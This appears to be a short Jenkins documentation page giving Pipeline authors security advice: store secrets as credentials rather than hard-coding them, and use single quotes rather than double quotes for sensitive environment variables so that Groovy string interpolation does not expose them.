The job of securing the Jenkins instance falls mostly on administrators, but Pipeline authors must also adhere to good security practices. We summarize these here.
If your Pipeline needs to access external resources such as a database, artifact repository, or cloud, be sure to use credentials for authorization rather than hard coding the username/password, secret text, or other identifiers in your Pipeline. See Using Credentials for more information.
Understand Groovy
string interpolation
and be very careful when passing sensitive data such as environment variables.
Never enclose sensitive environment variables in double quotes!
Data inside double quotes is subject to Groovy string interpolation, which means that Groovy evaluates the string and passes the actual value through where it may be visible as an argument to the sh or bat step or some other facility.
Data that is enclosed in single quotes is passed to the interpreter (sh, bat, powershell, or pwsh for evaluation and so is secure.
See Interpolation of sensitive environment variables and Injection via interpolation for more details.
Please submit your feedback about this page through this quick form.
Alternatively, if you don't wish to complete the quick form, you can simply indicate if you found this page helpful?
See existing feedback here.